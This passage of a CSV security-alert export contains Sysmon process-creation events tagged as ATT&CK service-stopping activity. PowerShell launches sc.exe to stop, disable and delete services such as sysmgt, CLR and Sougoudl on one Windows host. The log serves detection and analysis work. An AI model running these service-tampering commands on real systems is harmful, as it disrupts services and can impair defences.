Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Stop Sougoudl"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:18:58.136",8,"ATT&CK: Quick Execution of a Series of Suspicious Commands","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:50:27.846 +ProcessGuid: {df9fc3d3-b393-5ecf-0000-0010bdfb2000} +ProcessId: 7344 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Config Sougoudl Start= Disabled +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Config Sougoudl Start= Disabled",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:50:27.849035200Z"",""eventRecordID"":""2634"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:50:27.846\r\nProcessGuid: {df9fc3d3-b393-5ecf-0000-0010bdfb2000}\r\nProcessId: 7344\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Config Sougoudl Start= Disabled\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:50:27.846"",""processGuid"":""{df9fc3d3-b393-5ecf-0000-0010bdfb2000}"",""processId"":""7344"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Config Sougoudl Start= Disabled"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:18:58.075",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:50:27.800 +ProcessGuid: {df9fc3d3-b393-5ecf-0000-0010f6f92000} +ProcessId: 7748 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Stop WmdnPnSN +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Stop WmdnPnSN",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:50:27.802230900Z"",""eventRecordID"":""2632"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:50:27.800\r\nProcessGuid: {df9fc3d3-b393-5ecf-0000-0010f6f92000}\r\nProcessId: 7748\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Stop WmdnPnSN\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:50:27.800"",""processGuid"":""{df9fc3d3-b393-5ecf-0000-0010f6f92000}"",""processId"":""7748"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Stop WmdnPnSN"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:18:58.011",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:50:27.720 +ProcessGuid: {df9fc3d3-b393-5ecf-0000-00101bf72000} +ProcessId: 168 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Stop \gm +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Stop \\gm",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:50:27.723107900Z"",""eventRecordID"":""2629"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:50:27.720\r\nProcessGuid: {df9fc3d3-b393-5ecf-0000-00101bf72000}\r\nProcessId: 168\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Stop \\gm\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:50:27.720"",""processGuid"":""{df9fc3d3-b393-5ecf-0000-00101bf72000}"",""processId"":""168"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Stop \\\\gm"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:18:57.881",8,"ATT&CK: Quick Execution of a Series of Suspicious Commands","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:50:27.670 +ProcessGuid: {df9fc3d3-b393-5ecf-0000-001079f52000} +ProcessId: 7776 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Delete sysmgt +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Delete sysmgt",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:50:27.674830100Z"",""eventRecordID"":""2627"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:50:27.670\r\nProcessGuid: {df9fc3d3-b393-5ecf-0000-001079f52000}\r\nProcessId: 7776\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Delete sysmgt\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:50:27.670"",""processGuid"":""{df9fc3d3-b393-5ecf-0000-001079f52000}"",""processId"":""7776"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Delete sysmgt"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:18:57.855",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:50:27.651 +ProcessGuid: {df9fc3d3-b393-5ecf-0000-0010aff42000} +ProcessId: 7788 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Stop sysmgt +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Stop sysmgt",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:50:27.653788200Z"",""eventRecordID"":""2626"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:50:27.651\r\nProcessGuid: {df9fc3d3-b393-5ecf-0000-0010aff42000}\r\nProcessId: 7788\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Stop sysmgt\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:50:27.651"",""processGuid"":""{df9fc3d3-b393-5ecf-0000-0010aff42000}"",""processId"":""7788"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Stop sysmgt"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:18:57.807",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:50:27.527 +ProcessGuid: {df9fc3d3-b393-5ecf-0000-001068ed2000} +ProcessId: 1996 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Stop CLR +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Stop CLR",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:50:27.529350200Z"",""eventRecordID"":""2623"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:50:27.527\r\nProcessGuid: {df9fc3d3-b393-5ecf-0000-001068ed2000}\r\nProcessId: 1996\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Stop CLR\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:50:27.527"",""processGuid"":""{df9fc3d3-b393-5ecf-0000-001068ed2000}"",""processId"":""1996"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Stop CLR"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:18:57.748",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:50:27.475 +ProcessGuid: 